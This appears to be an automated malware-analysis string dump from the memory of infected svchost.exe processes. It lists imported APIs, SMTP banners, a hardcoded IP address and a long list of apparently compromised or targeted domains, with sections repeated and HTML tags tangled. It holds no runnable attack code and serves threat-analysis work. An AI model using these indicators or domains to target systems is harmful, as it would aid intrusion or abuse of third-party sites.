J<_T><pre>f%fR9</pre><pre>Z;3*/Z%x</pre><pre>&EL.Gb</pre><pre>!"7'$%6:)* ,-./02345&(#>;=?98< 1</pre><pre>%System%\regedit.exe</pre><pre>220 Mail.Ru ESMTP</pre><pre>220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp</pre><pre>220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp</pre><pre>220 mx4.messagingengine.com ESMTP . No UCE permitted.</pre><b>svchost.exe_2960:</b><pre>.text</pre><pre>`.data</pre><pre>iphlpapi.dll</pre><pre>inetcomm.dll</pre><pre>operator</pre><pre>KERNEL32.DLL</pre><pre>kernel32.dll</pre><pre>mscoree.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>EX8^/u$9^%u</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>HttpQueryInfoA</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestA</pre><pre>WININET.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>DNSAPI.dll</pre><pre>GdiplusShutdown</pre><pre>gdiplus.dll</pre><pre>GDI32.dll</pre><pre>ole32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>?<TH><pre>|G9ÂY</pre><pre>Vc!.UY</pre><pre>3>&< 0&.;</pre><pre>-i0}|</pre><pre>|.Xi/</pre><pre>!"7'$%6:)* ,-./02345&(#>;=?98< 1</pre><pre>mas.lavasoft.com</pre><pre>%System%\regedit.exe</pre><pre>[184.107.38.38]</pre><pre>220 Mail.Ru ESMTP</pre><pre>220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp</pre><pre>220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp</pre><pre>220 mx4.messagingengine.com ESMTP . No UCE permitted.</pre><b>svchost.exe_1876_rwx_04000000_00008000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>Content-Length: %d</pre><pre>http://%s/</pre><pre>HttpSendRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpOpenRequestA</pre><pre>InternetCrackUrlA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>SHLWAPI.dll</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>ole32.dll</pre><pre>zc)%c</pre><pre>cwmbranford.co.uk;ravaseguros.com.br;yasu-ragi.com;x-calibur.net;cvi.or.jp;huntscombo.com;marketingservicesnetwork.ca;crossroadsfcu.org;wateratwork.net;virtualblackfox.net;ewapps.com;keyad.com;npac.org.hk;khl.org.uk;ifta.org;gomadagascar.com;obiring.com;simplysup1.com;hopkintonnh.us;c21champs.com;sulsters.net;pluginz.ru;sitn.co.uk;aimusa-online.com;madmimi.com;felipegarrote.com;completemarketingsystems.com;kioil.com;siriusgt.com;b-met.com;samuraitours.com;revocars.com;jigami.com;intercountrymanagement.fr;ctl-components.co.uk;yano-jyuken.com;fratelliferrara.com;johnnykimono.com;lee-insurance.com;curiotu.com.tw;cabletech.co.za;dokument-festival.cz;009design.com;waffaartist.com;roofmaterials.com;fujisangyo.com;lists.riseup.net;akcja.pl;hf-cpa.com;disenosdaniel.com;radionovelli.com;pro-cert.org;ffvbbeach.org;premierimage.net;okchalets.com;visionpro.com.sg;kent67.com;krenim.org;darus.lt;flobeds.com;penrithgolfclub.com.au;goodmorningchildren.com;presentdirectory.com;zurbuchen.com;yellowstarcarpet.com;huthbenders.com;fgcm.net;marbach.com;aikomusic.com;qistech.com;torkair.com;loteria1benifaio.com;diaperlab.com;skspring.com;harpersphoto.co.uk;mesutreklam.com;syxht.com;mcmjobes.com;discoveryplace.org;softronmedia.com;destolfos.com;royalbotania.net;appliedspectra.com;differentimages.nl;saragazarek.com;teamboo.com;vitalhealthsoftware.com;tri-c.com;proadec.com.br;martineaumorris.com;garywollin.com;forest43.ru;theanniversarycompany.com;jonglierkatakomben.com;ogdenscoaches.com.au;madamlau.com;thatcherenergy.com;maximilianeum.ch;thedevines.com;mrwconnected.com;apnm.org;alfaglass.ru;greshams.com;jivarogroup.com;hospedagemsegura.com.br;cogmap.com;centralinsumos.com.bo;pisomania.com;metall-auer.at;fiskmarilia.com.br;desaxeoflondon.com;amberhotels.cz;verdeuropa.com;casescases.com;machprint.com;gerard-alsacien.com;branaganmeats.com;maewang.com;calcitrusquality.org;shinpd.com;polybeekindia.com;lapanthera.hu;coplanar.seobook.com;dogrings.com;vinaysaraf.com;storci.com;catholic-school-girls.com;snyderfd.com;onalaptop.com;tushlicking.com;ogaemon.com;tobler-skele.bg;fullmoons-cauldron.co.uk;dotnetpia.co.kr;electroexhibits.com;aecnet.co.jp;zenka-influence.com;himalayanhandicrafts.com;tokai-service.com;lingewaelsche.com;crwconsulting.com;cefam-atlas.fr;norcalclothingco.com;edfmodel.com;matrax.bg;ivcircus.ru;anemomylos.com;dancerecords.net;markusworks.com;ftzworld.com;benefits-inc.com;robins-enterprises.com;autohaus-repp.de;chazzlayne.com;illustrateur-jeunesse.com;astrolabio.net;kosovaere.com;thesyntheticfamily.com;takeuchi-ladies.com;nox.sk;designonglass.com;cadbaz.com;sceram.com;viainfo.net;galanos.com;mawsonclub.com.au;2wheelife.com;bandera-roja.com;kmsauto.com;prism-medical.com;durandigitalmedia.com;xanthus-farm.com;gelpass.com;doehrer.com;skischule-fankhauser.com;ascomp.com.pl;lasgo.co.uk;familyfinanse.pl;denno-insatsu.com;fullcas.com;centrevillesettlement.com;cinenganos.com;roma-studio.com;nextone-net.com;costadelsolestate.com;academia-elestudiante.com;bestebproperties.com;iputra.edu.my;alc-mg.com;medisurg.com;welbilt-thailand.com;academiamc.com;ks110.com;polishpotterydirect.com;toshindo-pub.com;bernois-tourtour.com;luckygroup.biz;rustytruckmusic.com;princetonhistory.org;losiracundos.com;tsu-box.com;ballarattiles.com.au;sugarfoote.com;m4m-usa.com;tk-a.com;xbox-gamer.net;contracorriente.com;bonafidekrewe.com;imaginehomessa.com;greenworkspc.com;sunbird-images.com;pyxis2.org;theoldciderhouse.co.uk;underdoglaw.com;printscharmingbc.ca;legalserver.org;mcvdberg.co.za;atelier-enseignes.com;bureauriscos.com.br;bizeulimmobilier.com;sansum.org;jpcreative.com;mhww.org;nwinnovation.com;namedecision.com;barattare.net;pattilyles.com;vitaliamedspava.com;min3.sakuraweb.com;gabinetemilitar.mg.gov.br;ultimate-tattoo-tips.com;frankfalvo.com;ta-shanghai.com;silverehitus.ee;jaguarlimousineservices.com;autoquipsales.com;hebbes.nl;</pre><b>svchost.exe_1876_rwx_13140000_01550000:</b><pre>.text</pre><pre>`.data</pre><pre>iphlpapi.dll</pre><pre>inetcomm.dll</pre><pre>operator</pre><pre>KERNEL32.DLL</pre><pre>kernel32.dll</pre><pre>mscoree.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>EX8^/u$9^%u</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>HttpQueryInfoA</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestA</pre><pre>WININET.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>DNSAPI.dll</pre><pre>GdiplusShutdown</pre><pre>gdiplus.dll</pre><pre>GDI32.dll</pre><pre>ole32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>J<_T><pre>f%fR9</pre><pre>Z;3*/Z%x</pre><pre>&EL.Gb</pre><pre>!"7'$%6:)* ,-./02345&(#>;=?98< 1</pre><pre>%System%\regedit.exe</pre><pre>220 Mail.Ru ESMTP</pre><pre>220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp</pre><pre>220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp</pre><pre>220 mx4.messagingengine.com ESMTP . No UCE permitted.</pre><b>svchost.exe_2960_rwx_04000000_00008000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>Content-Length: %d</pre><pre>http://%s/</pre><pre>HttpSendRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpOpenRequestA</pre><pre>InternetCrackUrlA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>SHLWAPI.dll</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>ole32.dll</pre><pre>zc)%c</pre><pre>cwmbranford.co.uk;ravaseguros.com.br;yasu-ragi.com;x-calibur.net;cvi.or.jp;huntscombo.com;marketingservicesnetwork.ca;crossroadsfcu.org;wateratwork.net;virtualblackfox.net;ewapps.com;keyad.com;npac.org.hk;khl.org.uk;ifta.org;gomadagascar.com;obiring.com;simplysup1.com;hopkintonnh.us;c21champs.com;sulsters.net;pluginz.ru;sitn.co.uk;aimusa-online.com;madmimi.com;felipegarrote.com;completemarketingsystems.com;kioil.com;siriusgt.com;b-met.com;samuraitours.com;revocars.com;jigami.com;intercountrymanagement.fr;ctl-components.co.uk;yano-jyuken.com;fratelliferrara.com;johnnykimono.com;lee-insurance.com;curiotu.com.tw;cabletech.co.za;dokument-festival.cz;009design.com;waffaartist.com;roofmaterials.com;fujisangyo.com;lists.riseup.net;akcja.pl;hf-cpa.com;disenosdaniel.com;radionovelli.com;pro-cert.org;ffvbbeach.org;premierimage.net;okchalets.com;visionpro.com.sg;kent67.com;krenim.org;darus.lt;flobeds.com;penrithgolfclub.com.au;goodmorningchildren.com;presentdirectory.com;zurbuchen.com;yellowstarcarpet.com;huthbenders.com;fgcm.net;marbach.com;aikomusic.com;qistech.com;torkair.com;loteria1benifaio.com;diaperlab.com;skspring.com;harpersphoto.co.uk;mesutreklam.com;syxht.com;mcmjobes.com;discoveryplace.org;softronmedia.com;destolfos.com;royalbotania.net;appliedspectra.com;differentimages.nl;saragazarek.com;teamboo.com;vitalhealthsoftware.com;tri-c.com;proadec.com.br;martineaumorris.com;garywollin.com;forest43.ru;theanniversarycompany.com;jonglierkatakomben.com;ogdenscoaches.com.au;madamlau.com;thatcherenergy.com;maximilianeum.ch;thedevines.com;mrwconnected.com;apnm.org;alfaglass.ru;greshams.com;jivarogroup.com;hospedagemsegura.com.br;cogmap.com;centralinsumos.com.bo;pisomania.com;metall-auer.at;fiskmarilia.com.br;desaxeoflondon.com;amberhotels.cz;verdeuropa.com;casescases.com;machprint.com;gerard-alsacien.com;branaganmeats.com;maewang.com;calcitrusquality.org;shinpd.com;polybeekindia.com;lapanthera.hu;coplanar.seobook.com;dogrings.com;vinaysaraf.com;storci.com;catholic-school-girls.com;snyderfd.com;onalaptop.com;tushlicking.com;ogaemon.com;tobler-skele.bg;fullmoons-cauldron.co.uk;dotnetpia.co.kr;electroexhibits.com;aecnet.co.jp;zenka-influence.com;himalayanhandicrafts.com;tokai-service.com;lingewaelsche.com;crwconsulting.com;cefam-atlas.fr;norcalclothingco.com;edfmodel.com;matrax.bg;ivcircus.ru;anemomylos.com;dancerecords.net;markusworks.com;ftzworld.com;benefits-inc.com;robins-enterprises.com;autohaus-repp.de;chazzlayne.com;illustrateur-jeunesse.com;astrolabio.net;kosovaere.com;thesyntheticfamily.com;takeuchi-ladies.com;nox.sk;designonglass.com;cadbaz.com;sceram.com;viainfo.net;galanos.com;mawsonclub.com.au;2wheelife.com;bandera-roja.com;kmsauto.com;prism-medical.com;durandigitalmedia.com;xanthus-farm.com;gelpass.com;doehrer.com;skischule-fankhauser.com;ascomp.com.pl;lasgo.co.uk;familyfinanse.pl;denno-insatsu.com;fullcas.com;centrevillesettlement.com;cinenganos.com;roma-studio.com;nextone-net.com;costadelsolestate.com;academia-elestudiante.com;bestebproperties.com;iputra.edu.my;alc-mg.com;medisurg.com;welbilt-thailand.com;academiamc.com;ks110.com;polishpotterydirect.com;toshindo-pub.com;bernois-tourtour.com;luckygroup.biz;rustytruckmusic.com;princetonhistory.org;losiracundos.com;tsu-box.com;ballarattiles.com.au;sugarfoote.com;m4m-usa.com;tk-a.com;xbox-gamer.net;contracorriente.com;bonafidekrewe.com;imaginehomessa.com;greenworkspc.com;sunbird-images.com;pyxis2.org;theoldciderhouse.co.uk;underdoglaw.com;printscharmingbc.ca;legalserver.org;mcvdberg.co.za;atelier-enseignes.com;bureauriscos.com.br;bizeulimmobilier.com;sansum.org;jpcreative.com;mhww.org;nwinnovation.com;namedecision.com;barattare.net;pattilyles.com;vitaliamedspava.com;min3.sakuraweb.com;gabinetemilitar.mg.gov.br;ultimate-tattoo-tips.com;frankfalvo.com;ta-shanghai.com;silverehitus.ee;jaguarlimousineservices.com;autoquipsales.com;hebbes.nl;</pre><b>svchost.exe_2960_rwx_13140000_01550000:</b><pre>.text</pre><pre>`.data</pre><pre>iphlpapi.dll</pre><pre>inetcomm.dll</pre><pre>operator</pre><pre>KERNEL32.DLL</pre><pre>kernel32.dll</pre><pre>mscoree.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>EX8^/u$9^%u</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>HttpQueryInfoA</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestA</pre><pre>WININET.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>DNSAPI.dll</pre><pre>GdiplusShutdown</pre><pre>gdiplus.dll</pre><pre>GDI32.dll</pre><pre>ole32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>?<TH><pre>|G9ÂY</pre><pre>Vc!.UY</pre><pre>3>&< 0&.;</pre><pre>-i0}|</pre><pre>|.Xi/</pre><pre>!"7'$%6:)* ,-./02345&(#>;=?98< 1</pre><pre>mas.lavasoft.com</pre><pre>%System%\regedit.exe</pre><pre>[184.107.38.38]</pre><pre>220 Mail.Ru ESMTP</pre><pre>220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp</pre><pre>220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp</pre><pre>220 mx4.messagingengine.com ESMTP . No UCE permitted.</pre></TH></pre></_T></pre></TH></pre></_T>